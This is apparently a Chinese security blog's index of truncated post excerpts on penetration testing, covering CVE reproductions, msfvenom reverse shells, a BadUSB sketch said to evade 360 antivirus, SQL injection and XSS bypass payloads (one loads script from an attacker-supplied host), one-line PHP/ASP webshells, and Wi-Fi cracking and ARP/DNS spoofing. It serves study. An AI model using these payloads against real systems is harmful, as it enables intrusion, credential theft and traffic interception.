- 博客(27)
- 收藏
- 关注
RSS订阅原创 Apache Tomcat AJP 文件包含漏洞复现(CVE-2020-10487)
影响范围:tomcat 7:<7.0.100tomcat 8: <7.5.51tomcat 9: <9.0.31利用条件:1、漏洞版本范围内。2、默认开启ajp服务。漏洞复现:nmap扫描: //默认端口8009,经测试存在更改默认端口为80,7009,9009情况。脚本利用: // -p指定端口 -f 目标文件路径...
2020-02-22 14:16:12
957
原创 Harbor越权任意管理员注册复现(CVE-2019-16097)
核心添加字段:"has_admin_role":true正常注册:添加管理员权限字段:"has_admin_role":true
2020-01-16 14:21:55
591
原创 wmic/schtasks内网远程连接常用命令
//本文仅为本人常用命令,完整命令可自行关键字百度。wmic:wmic /node:192.168.1.101 /user:admin /password:123456 process call create "d:\123.bat"// wmic 运行方式隐秘性较高,由于在进程中执行的改程序,所以不会有程序窗口回显。/node:[目标ip]/user:[目标用户名]...
2019-11-18 09:56:36
2022
原创 msf反弹shell内网渗透
用法示例:1. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<本机ip地址> lport=<本机监听端口> -f psh-reflection -o xx.ps1 //生成文件放在目标机目录下 //powershell执行脚本:powershell -windowstyle hidden -e...
2019-10-16 14:01:12
1798
1
原创 badusb示例代码可绕过360
绕过360版本代码:void setup() { // putpower shell your setup code here, to run once Keyboard.begin();//开始键盘通讯 delay(3000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500);Keyboard.press('r');//...
2019-10-16 10:28:41
3154
原创 Oracle手工注入命令总结
//若过滤了"" '', 可用not in ('字段')代替//若过滤了<>,可用!=代替1. 表名爆破//返回一条数据and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1))2. 字段爆破and 1=ctxsys.drithsx.sn(1,(select col...
2019-07-05 11:46:48
1538
原创 渗透测试实战之MS12-020漏洞
攻击环境:攻击主机:Kali受攻击机:Windows 2012 server0x01 漏洞发现1)主机端口扫描发现3389端口开放 //--script vulscan为nmap通用的漏洞扫描nmap --script=vuln -sV [目标ip]2)证明漏洞存在使用检查执行:use auxiliary/scanner/rdp/ms12_020_check...
2019-05-10 14:45:13
3126
原创 Supervisord 远程代码执行漏洞(CVE-2017-11610)漏洞复现
复现视频链接:https://www.ichunqiu.com/course/58895如下内容为复现及笔记Supervisord 远程代码执行漏洞(CVE-2017-11610)漏洞复现0x01 漏洞信息Supervisord是使用Python 开发的进程管理程序,Supervisord能够将命令行进程或服务变为后台运行的deamon(守护进程)。Supervisord拥有监控进...
2019-04-22 16:10:06
3819
1
原创 任意用户密码重置的十种常见姿势—学习笔记
任意用户密码重置的十种常见姿势视频链接:https://www.ichunqiu.com/course/59049以下为视频学习笔记1. 验证码不失效漏洞原因:验证码未设置时效限制,仅判断验证码是否正确,未判断验证码是否已失效。漏洞测试:枚举爆破,找到正确验证码。2. 验证码直接返回漏洞原因:客户端生成验证码,服务器响应包返回了正确的验证码与客户端验证码进行比对。漏...
2019-04-21 16:46:58
1720
原创 SQL常用十大报错函数
1.floor()id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);2.extractvalue()id = 1 and (extractvalue(1, concat(0x5c,(...
2019-04-17 16:23:29
3237
原创 XSS绕过方式
记录挖洞过程中所遇到的XSS绕过1. 过滤了<>尖括号://原理:利用html以及js伪协议,当用户打开页面缓冲页面会自动获取焦点,从而触发js代码生成script标签,达到目的。autofocus onfocus=location="javasCript:s=document.createElement("script");s.src="http://<ip>...
2019-04-16 20:29:40
2833
原创 渗透之Aircrack—wifi破解
环境:kali工具使用:无线网卡(型号雷凌RT3070L) //注意型号选择的使用,不同型号可能导致kali无法识别。步骤总结:1. kali连接外接无线网卡。2. ifconfig查看网卡信息(新出现的wlan0网卡)3. 开启网卡监听模式:airmon-ng start wlan04. wifi扫描:airodump-ng wlan0mon5. 连接客户端:airo...
2019-04-02 17:49:00
6937
原创 黑客攻防技术宝典Web实战篇(第二版)_读书笔记(第六章~第七章)
第六章 攻击验证机制一、验证技术:1. 基于HTML表单的验证2. 多元机制3. 客户SSL证书或智能卡4. HTTP基本和摘要验证5. 使用NTML或Kerberors、整合Windows的验证6. 验证服务二、 验证机制设计缺陷:1. 密码保密性不强:a) 非常短或空白的密码 b) 以常用的字典词汇或名称为密码 c) 密码和用户名完全相同 d) 仍然使用默认密...
2019-03-29 13:17:09
772
1
原创 黑客攻防技术宝典Web实战篇(第二版)_读书笔记(第四章~第五章)
第四章 解析应用程序4.1 枚举内容与功能4.1.1 Web抓取人工浏览或使用工具爬取Web站点的内容。robots.txt文件:列出了不希望Web爬虫访问或搜索引擎列入索引的URL。(有时存在敏感信息)自动化爬取的限制:一般无法正常处理不常用的导航机制(如复杂的JS代码动态建立和处理的菜单)。 可能无法抓取隐藏在编译客户端对象(如Flash、Java applet)中的...
2019-03-21 23:30:56
1210
1
原创 黑客攻防技术宝典Web实战篇(第二版)_读书笔记(第一章~第三章)
//相关章节(第一章~第三章)第一章 Web应用程序安全与风险1.2.1 “本站点是安全的”漏洞测试过程中出现频率(2007年~11年):跨站点脚本(XSS)(94%) 跨站点请求伪造(CSRF)(92%) 信息泄露(78%):服务器返回的错误信息泄露配置信息等。 不完善的访问控制措施(71%):未控制好用户访问数据的权限,导致用户跨权限访问数据。 不完善的身份认证措施(6...
2019-03-13 22:49:15
1281
原创 HTTP状态码
100 Continue:客户端提交一个包含主体请求时发送该响应,表示已经收到请求消息头,客户端继续发送主体。200 Ok:表示请求已经成功提交。201 Created:PUT请求的响应返回的状态码,表示请求已经成功提交。301 Moved Permanently:永久重定向到Location消息头中指定的URL。302 Found:临时重定向到Location消息头中指定的URL...
2019-03-13 22:17:53
162
原创 HTTP方法及消息头
HTTP常用方法:GET:获取资源,用于url查询字符串的形式向所请求的资源发送参数。 POST:执行操作。可以在URL查询字符串与消息主体中发送请求参数。 HEAD:查询资源是否存在,方法与GET相似,但不会返回消息主体。 TRACE:用于诊断,检测客户端与服务器之间是否存在任何操纵请求的代理服务器。 OPTIONS:获取服务器支持的http方法,也可以用来检查服务器性能。 PUT...
2019-03-13 15:31:33
651
原创 Apache2.4访问权限设置
Require all granted #允许所有来源访问Require all denied #拒绝所有来源访问Require local #仅允许本地访问Require ip 192.168.1.xxx 192.168.1.xxx #仅上述ip能够访问 每个ip空格隔开Require host xxx.com #仅允许xxx.com域名主机访问例...
2019-03-12 20:32:11
2615
原创 初识SRC漏洞平台提交漏洞
1.1 漏洞平台补天漏洞响应平台:https://butian.360.cn/漏洞银行:https://www.bugbank.cn/阿里云漏洞响应平台:https://security.alibaba.com/i春秋SRC部落:https://www.ichunqiu.com/src腾讯应急响应中心:https://security.tencent.com/index.php...
2019-03-08 22:05:31
50403
17
原创 SQL手工注入常规用法
Mysql5.0版本后 information_schemaunion select 1,database() //查看数据库union select 1,group_concat(table_name) from information_schema.tables where table_schema='xx' //查看xx数据库中表名union select ...
2019-03-07 19:49:57
449
原创 Ettercap工具使用之arp&dns欺骗
Ettercap实现arp&dns欺骗工具:ettercap步骤总结:1. 开启ettercap2. (选择网卡)选择菜单栏Sniff —> Unified sniffing —> 选择网卡 —> 确定3. (扫描主机)选择菜单栏Hosts —> Scan for hosts —> Hosts list4. (选择目标)选择目标ip...
2018-11-28 20:23:02
1030
原创 Nmap常用命令总结
1. nmap -sT 192.168.96.4 //TCP连接扫描,不安全,慢2. nmap -sS 192.168.96.4 //SYN扫描,使用最频繁,安全,快3. nmap -Pn 192.168.96.4 //目标机禁用ping,绕过ping扫描4. nmap -sU 192.168.96.4 //UDP扫描,慢,可得到有价值的服务器程序5. nmap -sI 僵...
2018-11-21 21:43:23
44782
2
原创 Google hack常用命令总结
Google Hack搜索总结常用关键字1. site ----搜索指定网站的内容 (示例:"网络安全 site:www.baidu.com" 意为 搜索www.baidu.com这个网站中含有"网络安全"内容的网页)4 (建议不加www,这样site:baidu.com,可以查询目标网站的二级域名等,能获得更多的信息) 2. intitle ----...
2018-11-21 19:03:59
1877
原创 Sqlmap常用命令总结及注入实战(Access、mysql)
sqlmap常用命令总结:注意:命令为kali linux中运行的 (windows中用python sqlmap.py执行)1#、注入六连:1. sqlmap -u "http://www.xx.com?id=x" 【查询是否存在注入点2. --dbs 【检测站点包含哪些数据库3. --current-db 【获取当前的数据库...
2018-11-19 20:40:29
49874
2
原创 一句话木马的初识体验
一句话小马: ASP:<% eval request("pass") %> PHP: <?php @eval($_POST['pass']); ?> <?php @assert(@_POST['pass'];)?> 大小马区别差异:大马:代码量多,功能强大(cmd执行,磁盘权限等),使用上相对较复杂。 小马:代码量精简(...
2018-11-19 10:26:47
911
原创 Kali 2018.4 安装及更新源
准备工作1.kali 镜像的下载,官网选择对应的版本下载https://www.kali.org/downloads/2.VMware的安装,同官网可下载 更新源总结#更新源gedit /etc/apt/sources.list#中科大kali源deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free...
2018-11-15 09:17:08
18575
3
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人